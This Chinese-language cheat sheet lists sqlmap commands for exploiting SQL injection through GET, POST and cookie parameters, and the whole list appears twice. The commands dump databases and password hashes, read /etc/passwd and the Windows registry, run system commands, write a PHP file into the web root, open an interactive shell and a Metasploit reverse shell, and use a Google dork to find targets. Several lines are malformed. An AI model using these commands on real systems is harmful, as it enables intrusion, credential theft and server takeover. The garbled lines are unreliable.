注入 分法不同,种类不同,先简单的分下类:
1.get型:sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x”
获取数据库
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --dbs
得到库名后获取表
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” -D 库名 --tables
获取字段
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” -D 库名 -T 表名 --columns
获取字段内容
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” -D 库名 -T 表名 -C "字段1,字段2" --dump
查看当前用户
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --current-user
查看当前连接的数据库
sqlmap -u "http://xxx.xx.xxx/xx.xxx?xx=x" --current-db
列数据库用户
sqlmap -u "http://xxx.xx.xxx/xx.xxx?xx=x" --users
判断当前用户是否是dba
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --is-dba
列举数据库用户密码 和指定用户密码
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --passwords
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --passwords -U sa
查看用户权限和指定用户的权限
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --privileges
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --privileges -U root
读取系统文件
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --file-read /etc/passwd
执行系统命令
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --os-cmd=whoami
写入文件到web
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” –file-write /localhost/mm.php –file-dest /var/www/html/xx.php -v 2
系统交互shell
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --os-shell
反弹shell 需要指定msf的安装路径
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --os-pwn -msf-path=/usr/share/metasploit-framework/
执行指定的sql语句查询
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” –sql-query “SELECT password FROM mysql.user WHERE user = ‘root’ LIMIT 0, 1″
读取win系统注册表
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --reg-read
执行系统命令
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --os-cmd=whoami
保存进度
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --dbs -o “sqlmap.log”
恢复已保存进度
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --dbs -o “sqlmap.log” --resume
指定数据库,绕过SQLMAP的自动检测
sqlmap -u “; -v 2 --dbms “PostgreSQL”
* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server
指定操作系统,绕过SQLMAP自动检测
sqlmap -u “; -v 2 --os “Windows”
* Linux
* Windows
google搜索引擎的使用
sqlmap -g "site:xx.xxx inurl:xxx"
-v #详细的等级(0-6)
0:只显示Python的回溯,错误和关键消息。
1:显示信息和警告消息。
2:显示调试消息。
3:有效载荷注入。
4:显示HTTP请求。
5:显示HTTP响应头。
6:显示HTTP响应页面的内容
2.post型: sqlmap -u “http://xxx.xx.xxx/xx.x” --data=”xxxx=xxxx&xxxx=xxx”
sqlmap -u “http://xxx.xx.xxx/xx.x” -r "POST数据"
3.cookie类注入: sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --cookie=”xxx=xxx&xxx=xxx”
sqlmap 使用可以参考
http://drops.wooyun.org/tips/143
https://github.com/sqlmapproject/sqlmap/wiki/Usage
1.get型:sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x”
获取数据库
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --dbs
得到库名后获取表
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” -D 库名 --tables
获取字段
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” -D 库名 -T 表名 --columns
获取字段内容
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” -D 库名 -T 表名 -C "字段1,字段2" --dump
查看当前用户
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --current-user
查看当前连接的数据库
sqlmap -u "http://xxx.xx.xxx/xx.xxx?xx=x" --current-db
列数据库用户
sqlmap -u "http://xxx.xx.xxx/xx.xxx?xx=x" --users
判断当前用户是否是dba
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --is-dba
列举数据库用户密码 和指定用户密码
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --passwords
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --passwords -U sa
查看用户权限和指定用户的权限
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --privileges
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --privileges -U root
读取系统文件
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --file-read /etc/passwd
执行系统命令
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --os-cmd=whoami
写入文件到web
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” –file-write /localhost/mm.php –file-dest /var/www/html/xx.php -v 2
系统交互shell
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --os-shell
反弹shell 需要指定msf的安装路径
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --os-pwn -msf-path=/usr/share/metasploit-framework/
执行指定的sql语句查询
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” –sql-query “SELECT password FROM mysql.user WHERE user = ‘root’ LIMIT 0, 1″
读取win系统注册表
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --reg-read
执行系统命令
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --os-cmd=whoami
保存进度
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --dbs -o “sqlmap.log”
恢复已保存进度
sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --dbs -o “sqlmap.log” --resume
指定数据库,绕过SQLMAP的自动检测
sqlmap -u “; -v 2 --dbms “PostgreSQL”
* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server
指定操作系统,绕过SQLMAP自动检测
sqlmap -u “; -v 2 --os “Windows”
* Linux
* Windows
google搜索引擎的使用
sqlmap -g "site:xx.xxx inurl:xxx"
-v #详细的等级(0-6)
0:只显示Python的回溯,错误和关键消息。
1:显示信息和警告消息。
2:显示调试消息。
3:有效载荷注入。
4:显示HTTP请求。
5:显示HTTP响应头。
6:显示HTTP响应页面的内容
2.post型: sqlmap -u “http://xxx.xx.xxx/xx.x” --data=”xxxx=xxxx&xxxx=xxx”
sqlmap -u “http://xxx.xx.xxx/xx.x” -r "POST数据"
3.cookie类注入: sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=x” --cookie=”xxx=xxx&xxx=xxx”
sqlmap 使用可以参考
http://drops.wooyun.org/tips/143
https://github.com/sqlmapproject/sqlmap/wiki/Usage